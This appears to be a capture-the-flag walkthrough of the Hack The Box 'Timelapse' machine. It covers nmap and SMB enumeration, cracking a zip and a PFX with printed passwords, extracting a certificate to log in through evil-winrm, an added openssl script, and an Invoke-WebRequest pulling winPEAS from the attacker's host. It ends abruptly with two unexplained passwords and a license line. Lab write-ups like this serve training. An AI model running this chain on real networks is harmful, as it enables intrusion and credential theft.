Timelapse HTB Machine
nmap -p- 10.10.11.152
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5986/tcp open wsmans syn-ack ttl 127
9389/tcp open adws syn-ack ttl 127
49667/tcp open unknown syn-ack ttl 127
49673/tcp open unknown syn-ack ttl 127
49674/tcp open unknown syn-ack ttl 127
49696/tcp open unknown syn-ack ttl 127
51231/tcp open unknown syn-ack ttl 127
nmap -sVC 10.10.11.152
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-06-13 15:03:29Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
smbclient -N -L 10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Investigating, we find several files on the Shares share:
smbclient \\\\10.10.11.152\\Shares
LAPS_Datasheet.docx LAPS.x64.msi
LAPS_OperationsGuide.docx winrm_backup.zip
LAPS_TechnicalSpecification.docx
winrm_backup.zip looks interesting, but it is password protected. The DOCX files are documentation for LAPS (Microsoft's Local Administrator Password Solution), i.e. how local administrator passwords are managed across the directory.
Let's try to crack the zip:
fcrackzip -D -u winrm_backup.zip -p /usr/share/wordlists/rockyou.txt
PASSWORD FOUND!!!!: pw == supremelegacy
The zip password was weak: supremelegacy. Inside we obtain legacyy_dev_auth.pfx.
A quick Google search turns up a guide on extracting certificate keys from a PFX file: https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file. The PFX itself is password protected, though, so we first need to crack that password with john. Convert the PFX into a john hash:
pfx2john legacyy_dev_auth.pfx > pfx_john_legacy.hash
john -w=/usr/share/wordlists/rockyou.txt pfx_john_legacy.hash
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:02:13 DONE (2022-06-13 04:00) 0.007506g/s 24256p/s 24256c/s 24256C/s thuglife03282006..thug209
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Found PFX password: thuglegacy
Now let's extract the key and the certificate.
Extract the certificate (certificate only, no key material):
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.pem
Extract the private key (unencrypted, -nodes, so evil-winrm can use it without a passphrase):
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv.pem -nodes
After formatting the files correctly (plain PEM, without the Bag Attributes headers that openssl pkcs12 prepends) we can connect via WinRM over HTTPS (port 5986, the wsmans service from the scan) using the certificate for authentication; -S enables SSL:
evil-winrm -S -k formated/key.key -c formated/cert.crt -i 10.10.11.152
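As an added example (not part of the original writeup), the following bash script bundles the two openssl extraction steps into one function that also does the "formatting": it re-encodes the output through openssl x509 / openssl pkey so the Bag Attributes headers are stripped, and it verifies that the extracted key actually matches the certificate before you point evil-winrm at the files. It assumes the openssl CLI is on PATH. Since legacyy_dev_auth.pfx and its password cannot be reproduced offline, make_sample_pfx builds a constructed, throwaway self-signed PFX with a weak password to run against.

```bash
#!/usr/bin/env bash
# Added example for this writeup (not the original author's commands):
# extract the certificate and the unencrypted private key from a
# password-protected PKCS#12 (.pfx) file, in the layout evil-winrm -c/-k
# expects, and verify the two belong together before using them.
# Assumes the openssl CLI is on PATH.
set -eu

# pfx_to_pem <file.pfx> <password> <outdir>
# Writes <outdir>/cert.crt (certificate only) and <outdir>/key.key
# (private key, unencrypted), both as clean PEM without Bag Attributes.
# Returns 1 on a wrong password or if the key does not match the cert.
pfx_to_pem() {
  local pfx="$1" pass="$2" outdir="$3"
  mkdir -p "$outdir"
  # Certificate only: -clcerts selects the client cert, -nokeys drops key
  # material; piping through openssl x509 re-emits plain PEM.
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -clcerts -nokeys 2>/dev/null \
      | openssl x509 -out "$outdir/cert.crt" 2>/dev/null || return 1
  # Private key only: -nocerts drops certs, -nodes writes it unencrypted
  # (evil-winrm cannot prompt for a key passphrase); openssl pkey cleans it up.
  openssl pkcs12 -in "$pfx" -passin "pass:$pass" -nocerts -nodes 2>/dev/null \
      | openssl pkey -out "$outdir/key.key" 2>/dev/null || return 1
  chmod 600 "$outdir/key.key"
  # The public key inside the cert must equal the one derived from the key.
  local cert_pub key_pub
  cert_pub=$(openssl x509 -in "$outdir/cert.crt" -noout -pubkey | openssl sha256)
  key_pub=$(openssl pkey -in "$outdir/key.key" -pubout | openssl sha256)
  [ "$cert_pub" = "$key_pub" ]
}

# cert_subject <cert.pem>: show which identity the certificate maps to.
cert_subject() {
  openssl x509 -in "$1" -noout -subject
}

# make_sample_pfx <dir> <password>
# Constructed sample data: a throwaway self-signed cert/key pair bundled into
# <dir>/sample.pfx with the given password, standing in for legacyy_dev_auth.pfx.
make_sample_pfx() {
  local dir="$1" pass="$2"
  mkdir -p "$dir"
  openssl req -x509 -newkey rsa:2048 -nodes -days 1 -subj "/CN=legacyy" \
      -keyout "$dir/sample.key" -out "$dir/sample.crt" 2>/dev/null
  openssl pkcs12 -export -inkey "$dir/sample.key" -in "$dir/sample.crt" \
      -passout "pass:$pass" -out "$dir/sample.pfx"
}

# Command-line use: ./pfx_to_pem.sh legacyy_dev_auth.pfx thuglegacy formated
if [ "$#" -ge 2 ]; then
  pfx_to_pem "$1" "$2" "${3:-formated}"
  cert_subject "${3:-formated}/cert.crt"
fi
```

Run it as ./pfx_to_pem.sh legacyy_dev_auth.pfx thuglegacy formated to produce formated/cert.crt and formated/key.key for the evil-winrm command above. A wrong password, or a PFX whose key and certificate disagree, makes pfx_to_pem return 1 instead of leaving you to debug an opaque WinRM authentication failure.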
Let's run winPEAS (fetched from our own HTTP server; Invoke-WebRequest needs the http:// scheme):
Invoke-WebRequest -Uri http://10.10.14.20:8000/winPEASx64.exe -OutFile winpeas.exe
My pass is: E3R$Q62^12p7PLlC%KWaxuaV
sh pass: G!OSV[!-e[-w).,4rK6G,78/
Distributed under the MIT License. See LICENSE.txt
for more information.
Pol Galvez - [email protected]